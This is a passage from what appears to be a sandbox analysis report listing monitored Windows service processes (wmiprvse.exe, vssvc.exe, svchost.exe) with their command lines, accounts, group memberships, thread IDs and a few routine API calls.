"rpc_server" parent_id = "3" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00040a67" [0xc000000f] Thread: id = 64 os_tid = 0x838 Thread: id = 65 os_tid = 0xa6c Thread: id = 66 os_tid = 0xa60 Thread: id = 67 os_tid = 0xa5c Thread: id = 68 os_tid = 0xa58 Thread: id = 69 os_tid = 0xa54 Thread: id = 70 os_tid = 0xa50 Thread: id = 71 os_tid = 0xa48 Thread: id = 72 os_tid = 0xa44 Thread: id = 111 os_tid = 0x7a4 Thread: id = 2641 os_tid = 0xda8 Process: id = "5" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x62a64000" os_pid = "0xa0c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 73 os_tid = 0x848 Thread: id = 74 os_tid = 0xa2c Thread: id = 75 os_tid = 0xa28 Thread: id = 76 os_tid = 0xa24 Thread: id = 77 os_tid = 0xa20 Thread: id = 78 os_tid = 0xa1c Thread: id = 79 os_tid = 0xa14 Thread: id = 80 os_tid = 0xa10 Thread: id = 113 os_tid = 0x244 Thread: id = 2640 os_tid = 0xda4 Process: id = "6" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x5a742000" os_pid = "0xbf8" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005ea42" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 83 os_tid = 0x598 Thread: id = 84 os_tid = 0x570 [0107.571] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe3d7a0 | out: lpSystemTimeAsFileTime=0xe3d7a0*(dwLowDateTime=0x6e1e58e0, dwHighDateTime=0x1d6eb2b)) [0107.571] GetCurrentProcessId () returned 0xbf8 [0107.571] GetCurrentThreadId () returned 0x570 [0107.571] GetTickCount () returned 0x114cba9 [0107.571] QueryPerformanceCounter (in: lpPerformanceCount=0xe3d7a8 | out: lpPerformanceCount=0xe3d7a8*=22779882716) returned 1 [0107.571] malloc (_Size=0x100) returned 0x708e80 [0150.891] free (_Block=0x708e80) Thread: id = 85 os_tid = 0x4e4 Thread: id = 86 os_tid = 0xbb8 Thread: id = 87 os_tid = 0x80c Thread: id = 88 os_tid = 0x5f4 Thread: id = 89 os_tid = 0x5e4 Thread: id = 104 os_tid = 0x85c Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 90 os_tid = 0xb2c Thread: id = 91 os_tid = 0x768 Thread: id = 92 os_tid = 0x764 Thread: id = 93 os_tid = 0x758 Thread: id = 94 os_tid = 0x724 Thread: id = 95 os_tid = 0x718 Thread: id = 96 os_tid = 0x714 Thread: id = 97 os_tid = 0x154 Thread: id = 98 os_tid = 0x150 Thread: id = 99 os_tid = 0x120 Thread: id = 100 os_tid = 0x124 Thread: id = 101 os_tid = 0x118 Thread: id = 102 os_tid = 0xf0 Thread: id = 103 os_tid = 0x1c0 Thread: id = 2594 os_tid = 0xd0c Thread: id = 2596 os_tid = 0xd20 Thread: id = 2638 os_tid = 0xd94 Thread: id = 2645 os_tid = 0xddc Thread: id = 2648 os_tid = 0xe34 Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4e949000" os_pid = "0x86c" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005f827" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 105 os_tid = 0x84c Thread: id = 106 os_tid = 0x83c Thread: id = 107 os_tid = 0x81c Thread: id = 108 os_tid = 0x8ec Thread: id = 109 os_tid = 0x7cc Thread: id = 110 os_tid = 0x15c Thread: id = 2642 os_tid = 0xdb8 Thread: id = 2646 os_tid = 0xdf4 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 2597 os_tid = 0xcf0 Thread: id = 2598 os_tid = 0xa3c Thread: id = 2599 os_tid = 0xbd4 Thread: id = 2600 os_tid = 0x6ec Thread: id = 2601 os_tid = 0x548 Thread: id = 2602 os_tid = 0x750 Thread: id = 2603 os_tid = 0x6a0 Thread: id = 2604 os_tid = 0x680 Thread: id = 2605 os_tid = 0x66c Thread: id = 2606 os_tid = 0x5fc Thread: id = 2607 os_tid = 0x188 Thread: id = 2608 os_tid = 0x140 Thread: id = 2609 os_tid = 0x128 Thread: id = 2610 os_tid = 0x2b0 Thread: id = 2611 os_tid = 0x218 Thread: id = 2612 os_tid = 0x1cc Thread: id = 2639 os_tid = 0xd98 Thread: id = 2643 os_tid = 0xdc4 Thread: id = 2644 os_tid = 0xdc8 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 2613 os_tid = 0xcd8 Thread: id = 2614 os_tid = 0xc48 Thread: id = 2615 os_tid = 0x638 Thread: id = 2616 os_tid = 0x554 Thread: id = 2617 os_tid = 0x720 Thread: id = 2618 os_tid = 0x668 Thread: id = 2619 os_tid = 0x65c Thread: id = 2620 os_tid = 0x144 Thread: id = 2621 os_tid = 0x110 Thread: id = 2622 os_tid = 0x3f0 Thread: id = 2623 os_tid = 0x3ec Thread: id = 2624 os_tid = 0x3e4 Thread: id = 2625 os_tid = 0x3e0 Thread: id = 2626 os_tid = 0x3d0 Thread: id = 2627 os_tid = 0x3cc Thread: id = 2628 os_tid = 0x398 Thread: id = 2629 os_tid = 0x394 Thread: id = 2630 os_tid = 0x384 Thread: id = 2631 os_tid = 0x380 Thread: id = 2632 os_tid = 0x350 Thread: id = 2633 os_tid = 0x33c Thread: id = 2637 os_tid = 0xd90